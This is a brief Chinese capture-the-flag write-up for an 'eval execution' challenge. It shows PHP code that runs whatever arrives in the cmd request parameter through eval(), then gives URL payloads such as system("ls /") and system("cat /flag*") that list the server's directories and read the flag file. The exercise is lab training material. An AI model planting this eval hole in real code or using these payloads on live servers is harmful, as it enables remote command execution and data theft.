eval执行
源代码
<?php
if (isset($_REQUEST['cmd'])) {eval($_REQUEST["cmd"]);
} else {highlight_file(__FILE__);
}
?>PHP代码显示,要求将命令赋值给cmd然后执行
先查看一下根目录文件 /?cmd=system("ls");
查看上一级目录找flag文件
/?cmd=system("ls /");
打开flag文件发现FLAG
/?cmd=system("cat /flag_9237");
linux在读取flag的时候可以使用*去匹配
cat /flag*
/?cmd=system("cat /flag*");
